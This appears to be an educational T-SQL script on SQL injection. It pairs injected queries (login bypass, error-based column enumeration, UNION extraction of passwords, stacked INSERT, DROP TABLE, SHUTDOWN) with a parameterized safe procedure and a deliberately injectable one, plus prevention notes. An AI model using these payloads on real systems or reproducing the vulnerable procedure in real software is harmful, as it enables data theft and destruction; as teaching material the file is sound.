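-- SQL injection attack examples (SQL Server / T-SQL: dbo schema, `--` line comments, sp_executesql, SHUTDOWN).
-- Every `select` below is the statement an application ends up sending when it concatenates untrusted
-- input into its query string: the injected text starts right after the first empty quote ('') and the
-- trailing `--` comments out the closing quote the application itself appended.
-- (The original first line began with a single `-`, which is not a comment in T-SQL.)
--
-- Log in as any user (prevention: pass values as parameters, never concatenate them into the SQL text).
-- `or 1=1` makes the WHERE clause true for every row, so the "login" query returns the whole table.
select * from dbo.userinfo where userName='' and userPwd=''or 1=1--'
select * from dbo.userinfo where userName=''or 1=1--'
-- Dump every row. (The original note said "everything except VINET", but `OR 1=1` makes the userID
-- filter irrelevant, so VINET's row is returned as well.)
select * from dbo.userinfo where userID='VINET' OR 1=1
-- Log in with a known account name and no password: the `--` removes the `and userPwd=...` part the
-- application appended. The trailing space in 'admin ' does not matter: SQL Server ignores trailing
-- blanks when comparing strings for equality, so this still matches 'admin'.
select * from dbo.userinfo where userName='admin '--'
-- Enumerate columns from error messages (prevention: custom error page; never echo database errors
-- to the client). HAVING without GROUP BY makes SQL Server raise an error that names the first column
-- which is neither aggregated nor grouped; adding that column to GROUP BY leaks the next one, and so on.
select * from dbo.userinfo where userName=''HAVING 1=1--'
select * from dbo.userinfo where userName=''GROUP BY UserID HAVING 1=1--'
select * from dbo.userinfo where userName=''GROUP BY UserID,UserName HAVING 1=1--'
select * from dbo.userinfo where userName=''GROUP BY UserID,UserName,UserPwd HAVING 1=1--'
-- Insert a row using the column layout learned above (the original note reports this succeeded).
-- Stacked statements (the `;` after the first query) work because SQL Server executes the whole batch.
-- `VALUES` without a column list only works when the value count matches the table's insertable columns.
select * from dbo.userinfo where userName='';INSERT INTO userinfo Values('hacker','hacker')--'
-- Destructive: drop a table (needs the application login to hold ALTER/CONTROL on it).
select * from dbo.userinfo where userName='';drop table dbo.Hello--'
-- Extract account data through UNION. The original query returns nothing (userName=''), so only the
-- injected SELECT's rows come back; each step needs the UNION's column count and types to line up.
select * from dbo.userinfo where userName=''UNION SELECT 'abc',1,1 FROM userinfo --' -- probe column types
select * from dbo.userinfo where userName=''UNION SELECT 1,1,1 FROM userinfo --' -- probe column count / header names
select * from dbo.userinfo where userName=''UNION SELECT userID,userName,1 FROM userinfo WHERE UserName>'a'--' -- all account names
select * from dbo.userinfo where userName=''UNION SELECT userID,userName,userPwd FROM userinfo where UserName>'a'--' -- account names with passwords
-- Stop the service; needs sysadmin/serveradmin rights on the application's login (likewise
-- `;DROP DATABASE D_Name --` and `;DROP TABLE T_Name --`). A least-privilege application login cannot
-- run these even when the injection itself succeeds.
select * from dbo.userinfo where userName='' ;SHUTDOWN--'
--
-- Calls to the two procedures defined below (they must already exist when these lines run).
-- Parameterized version: the values travel as sp_executesql parameters and cannot alter the statement.
exec dbo.SafeQueryCustomers 'l','l'
-- Concatenating version: the injected password is spliced into the WHERE clause, so every row comes back.
-- The injected value has to be passed as ONE quoted argument; the original form `'l','' or 1=1 --'` is a
-- T-SQL syntax error in the EXEC argument list (`or` is not allowed there).
exec dbo.SafeQueryCustomers2 'l',''' or 1=1 --'
-- Batch separator: the CREATE PROCEDURE that follows must be the first statement in its batch.
GO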
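CREATE PROCEDURE dbo.SafeQueryCustomers
(
@userName nvarchar(30),
@userPwd nvarchar(12)
)
AS
-- Parameterized dynamic search of dbo.userinfo (the safe counterpart of SafeQueryCustomers2).
-- The WHERE clause is assembled from fixed text only; the caller's values reach the engine as
-- sp_executesql parameters (@puserName / @puserPwd), so they can never change the statement's shape.
--
-- @userName  optional substring to match in userName; NULL = no filter on that column.
-- @userPwd   optional substring to match in userPwd;  NULL = no filter on that column.
-- Result set: every column of dbo.userinfo for the matching rows.
--
-- Fixes relative to the previous version:
--   * the sp_executesql parameter-definition string had been mangled into a "mailto:N%27..." link;
--   * the "no filter" case tested LEN(@STR), which is never 0, and then called SUBSTRING with a
--     negative length (an error) instead of running the unfiltered SELECT;
--   * '%' + @userPwd + '%' was written back into the nvarchar(12) parameter and silently truncated
--     for passwords of 11+ characters (the trailing '%' was lost);
--   * LIKE metacharacters in the input ('%', '_', '[') are now escaped, so a caller can no longer
--     pass '%' as the password and match every account.
-- NOTE(review): substring matching on a plaintext password column is kept only because the demo call
-- `exec dbo.SafeQueryCustomers 'l','l'` relies on it; a real login compares a stored hash with `=`.
DECLARE @sql nvarchar(255);
DECLARE @where nvarchar(255);
-- Patterns live in wider variables: escaping can at most double the input, plus the two '%'.
DECLARE @namePattern nvarchar(64);
DECLARE @pwdPattern nvarchar(64);

SET @sql = N'SELECT * FROM dbo.userinfo';
SET @where = N'';

IF @userName IS NOT NULL
BEGIN
    -- Backslash is escaped first so the escapes added afterwards are not themselves un-escaped.
    SET @namePattern = N'%' + REPLACE(REPLACE(REPLACE(REPLACE(@userName, N'\', N'\\'), N'%', N'\%'), N'_', N'\_'), N'[', N'\[') + N'%';
    SET @where = N'userName LIKE @puserName ESCAPE N''\''';
END;

IF @userPwd IS NOT NULL
BEGIN
    SET @pwdPattern = N'%' + REPLACE(REPLACE(REPLACE(REPLACE(@userPwd, N'\', N'\\'), N'%', N'\%'), N'_', N'\_'), N'[', N'\[') + N'%';
    -- Join with AND only when a userName predicate is already present.
    SET @where = @where + CASE WHEN @where = N'' THEN N'' ELSE N' AND ' END + N'userPwd LIKE @puserPwd ESCAPE N''\''';
END;

IF @where <> N''
    SET @sql = @sql + N' WHERE ' + @where;

-- Parameters the statement does not reference (NULL filters) are ignored by sp_executesql,
-- so one call covers every combination of filters.
EXEC sp_executesql @sql,
    N'@puserName nvarchar(64), @puserPwd nvarchar(64)',
    @puserName = @namePattern, @puserPwd = @pwdPattern;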
-- =============================================
-- Batch separator: the CREATE PROCEDURE that follows must be the first statement in its batch.
GO
CREATE PROCEDURE dbo.SafeQueryCustomers2
(
@userName nvarchar(30),
@userPwd nvarchar(12)
)
AS
-- INJECTABLE counterpart of SafeQueryCustomers, kept as the demonstration target for the
-- `exec dbo.SafeQueryCustomers2 ...` call near the top of the file. Despite the name it is NOT safe:
-- @userName and @userPwd are spliced into the SQL text below, so a value such as  ' or 1=1 --
-- closes the LIKE literal, appends its own predicate and comments out the rest of the statement.
-- Passing a value as a stored-procedure parameter does not protect dynamic SQL built inside the
-- procedure; only sp_executesql parameters (as in SafeQueryCustomers) do.
-- @userName / @userPwd: optional substring filters, NULL = no filter. Returns matching rows of dbo.userinfo.
DECLARE @STR nvarchar(255)
DECLARE @WK nvarchar(255)
SET @STR = 'SELECT * FROM dbo.userinfo'
SET @WK = ''
IF NOT @userName IS NULL
BEGIN
-- Untrusted value concatenated into the query text: injection point #1.
SET @WK = @WK + ' userName LIKE ''%' +@userName + '%'' AND '
END
IF NOT @userPwd IS NULL
BEGIN
-- Injection point #2; this is the argument the demo call exploits.
SET @WK = @WK + ' userPwd LIKE ''%' +@userPwd + '%'' AND '
END
-- LEN(@STR) is never 0 (it was just set to a constant), so when both inputs are NULL this branch
-- calls SUBSTRING with a negative length and fails instead of selecting all rows.
IF LEN(@STR) > 0
BEGIN
-- Strips the trailing ' AND ': LEN() ignores the trailing space and SUBSTRING's start position 0
-- drops one more character, which together remove exactly the five characters of ' AND '.
SET @STR = @STR+' WHERE '+SUBSTRING(@WK,0,LEN(@WK)-3)
-- Executed without a parameter list: the injected text is already part of @STR.
exec sp_executesql @STR
End
ELSE
exec sp_executesql @STR